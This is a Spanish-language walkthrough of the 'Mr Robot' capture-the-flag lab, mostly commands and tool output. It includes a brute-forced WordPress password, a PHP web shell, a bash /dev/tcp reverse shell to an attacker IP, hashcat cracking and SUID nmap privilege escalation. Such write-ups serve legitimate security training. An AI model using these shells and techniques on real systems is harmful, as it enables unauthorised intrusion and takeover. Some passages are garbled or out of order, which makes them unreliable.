Mr Robot CTF
Escaneo inicial:
Hacemos una busqueda de directorios:
└─$ gobuster dir -u http://10.10.165.114/ -w /usr/share/wordlists/dirb/common.txt | tee gobuster.out$ gobuster dir -u http://10.10.79.200/ -w /usr/share/wordlists/dirb/common.txt | tee gobuster.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.79.200/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/21 11:27:31 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.79.200/0/]
/admin (Status: 301) [Size: 234] [--> http://10.10.79.200/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/atom/]
/audio (Status: 301) [Size: 234] [--> http://10.10.79.200/audio/]
/blog (Status: 301) [Size: 233] [--> http://10.10.79.200/blog/]
/css (Status: 301) [Size: 232] [--> http://10.10.79.200/css/]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-admin/]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/images (Status: 301) [Size: 235] [--> http://10.10.79.200/images/]
/Image (Status: 301) [Size: 0] [--> http://10.10.79.200/Image/]
/image (Status: 301) [Size: 0] [--> http://10.10.79.200/image/]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> http://10.10.79.200/]
/intro (Status: 200) [Size: 516314]
/js (Status: 301) [Size: 231] [--> http://10.10.79.200/js/]
/license (Status: 200) [Size: 309]
/login (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> http://10.10.79.200/]
/phpmyadmin (Status: 403) [Size: 94]
/readme (Status: 200) [Size: 64]
/rdf (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/rdf/]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> http://10.10.79.200/video/]
/wp-admin (Status: 301) [Size: 237] [--> http://10.10.79.200/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.79.200/wp-content/]
/wp-config (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.79.200/wp-includes/]
/wp-cron (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 227]
/wp-load (Status: 200) [Size: 0]
/wp-login (Status: 200) [Size: 2606]
/wp-mail (Status: 500) [Size: 3064]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-login.php?action=register]
/xmlrpc (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42] Entramos a robots.txt
Visita robots.txt o robots :
Copiar
User-agent: *
fsocity.dic
key-1-of-3.txt$ curl http://10.10.79.200/key-1-of-3.txt -o key1.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 33 100 33 0 0 95 0 --:--:-- --:--:-- --:--:-- 95
$ cat key1.txt
REDACTEDEscaneo WPS
El comando que ejecutaste con wpscan realiza un análisis de seguridad en un sitio web que utiliza WordPress. Aquà tienes un resumen de lo que hace:
wpscan --url http://10.10.166.52/ -v -o wpscan-verbose$ cat wpscan-verbose
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.79.200/ [10.10.79.200]
[+] Started: Fri May 21 11:55:02 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.79.200/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.79.200/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] The external WP-Cron seems to be enabled: http://10.10.79.200/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.79.200/0bdcad3.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.79.200/0bdcad3.html, Match: 'WordPress 4.3.1'
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.79.200/wp-content/themes/twentyfifteen/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://10.10.79.200/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://10.10.79.200/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer.
| Author: the WordPress team
| Author URI: https://wordpress.org/
| License: GNU General Public License v2 or later
| License URI: http://www.gnu.org/licenses/gpl-2.0.html
| Tags: black, blue, gray, pink, purple, white, yellow, dark, light, two-columns, left-sidebar, fixed-layout, responsive-layout, accessibility-ready, custom-background, custom-colors, custom-header, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready
| Text Domain: twentyfifteen
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.79.200/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'
[i] No plugins Found.
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri May 21 11:57:46 2021
[+] Requests Done: 140
[+] Cached Requests: 39
[+] Data Sent: 34.919 KB
[+] Data Received: 53.111 KB
[+] Memory used: 204.859 MB
[+] Elapsed time: 00:02:43Forzar el inicio de sesión en Wordpress
fsociedad.dic
En el robots.txt también encontramos un archivo de diccionario.
Al descargarlo, descubrimos que parece un archivo de nombre de usuario y contraseña.
Aquie descargamos el diccionario de palabras para usarlo despues:
$ wget 10.10.79.200/fsocity.dic
--2021-05-21 12:00:07-- http://10.10.79.200/fsocity.dic
Connecting to 10.10.79.200:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=============================================================>] 6.91M 752KB/s in 16s
2021-05-21 12:00:23 (445 KB/s) - ‘fsocity.dic’ saved [7245381/7245381]Identificación del nombre de usuario
Si has visto Mr. Robot , sabes que Elliot es el nombre del protagonista.
Entonces, ingreso Elliot:something como nombre de usuario y contraseña.
Y pude confirmar que existÃa un usuario llamado Elliot .
Usando wpscan Sabemos el nombre de usuario. Necesitamos forzar la contraseña.
Podemos utilizar fsocity.dic como lista de palabras, pero el archivo es muy grande.
Intente obtener solo los valores únicos utilizando sort -u.
Al parecer, el tamaño del archivo se redujo drásticamente (de 850 000 valores a 11 000 valores). ¡Es fácil realizar ataques de fuerza bruta!
$ wc -l fsocity.dic
858160 fsocity.dic
$ sort -u fsocity.dic > uniq-fscoity.dic
$ wc -l uniq-fscoity.dic
11451 uniq-fscoity.dicUso wpscanpara forzar la contraseña:
┌──(docker㉿docker)-[~/HackBox]
└─$ wpscan --url http://10.10.166.52 -t 50 -U Elliot -P uniq-fscoity.dic
[!] Valid Combinations Found:
| Username: Elliot, Password: ER28-0652
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Dec 28 16:34:01 2024
[+] Requests Done: 184
[+] Cached Requests: 6
[+] Data Sent: 1.233 MB
[+] Data Received: 1.189 MB
[+] Memory used: 303.211 MB
[+] Elapsed time: 00:01:29
Entramos al panel:
La shell seria de esta manera si queremos que sea ocmo un forms:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>Se verÃa de esta manera:
Si queremos que sea hacia nuestra maquina atacante:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.3.237/1234 0>&1'");
?>Esto nos entrega la revershell:
Ahora buscando se encontro un hash MD5:
c3fcd3d76192e4007dfb496cca67e13bUtilizaremos el grande Rockyou...
┌──(docker㉿docker)-[~/HackBox]
└─$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txtContraseña: c3fcd3d76192e4007dfb496cca67e13b: abcdefghijklmnopqrstuvwxyz
Ahora con la contraseña del usuario somos root
Escalada de privilegios
El usuario robot no tiene derechos sudo:
Copiar
robot@linux:/$ sudo -l
[sudo] password for robot:
Sorry, user robot may not run sudo on linux.Linguistas corriendo
Linpeas entregó fácilmente el vector de escalada de privilegios:
nmap
Copiar
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
.
.
-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmaprobot@linux:~$ nmap --interactive
nmap> !sh
# ls
ls
key-2-of-3.txt password.raw-md5
# cat key-2-of-3.txt
cat key-2-of-3.txtLast updated